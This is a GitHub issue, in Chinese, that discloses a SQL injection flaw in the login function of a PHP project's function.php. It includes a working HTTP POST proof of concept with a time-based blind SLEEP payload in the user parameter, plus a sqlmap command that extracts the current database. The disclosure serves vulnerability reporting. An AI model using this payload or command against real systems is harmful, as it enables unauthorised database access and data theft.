Skip to content

function.php文件下login方法存在sql注入漏洞 #63

New issue
New issue
Open
Open
function.php文件下login方法存在sql注入漏洞#63
@naixiao

Description

@naixiao
naixiao
opened on Nov 10, 2025

漏洞成因:在function.php文件下login方法$user参数可控,攻击者可以通过构造恶意语句进行恶意操作。且在admin/index.php和api.php文件下均调用了login()函数。

Image

漏洞复现:
POC:
POST /api.php HTTP/1.1
Host: 94list:83
Content-Length: 88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: application/json, text/plain, /
Content-Type: application/x-www-form-urlencoded
Origin: http://94list:83
Referer: http://94list:83/admin/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=r3ri1ru38uvdjegkruqr57aorb
Connection: keep-alive

type=login&user=1' AND (SELECT 9679 FROM (SELECT(SLEEP(5)))qzmH) AND 'bXOt'='bXOt&pass=1

Image

sqlmap的poc
将上面POC内容改成type=login&user=1*&pass=1,放入x.txt文件下

python sqlmap.py -r x.txt --current-db --batch

结果如下图:

Image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions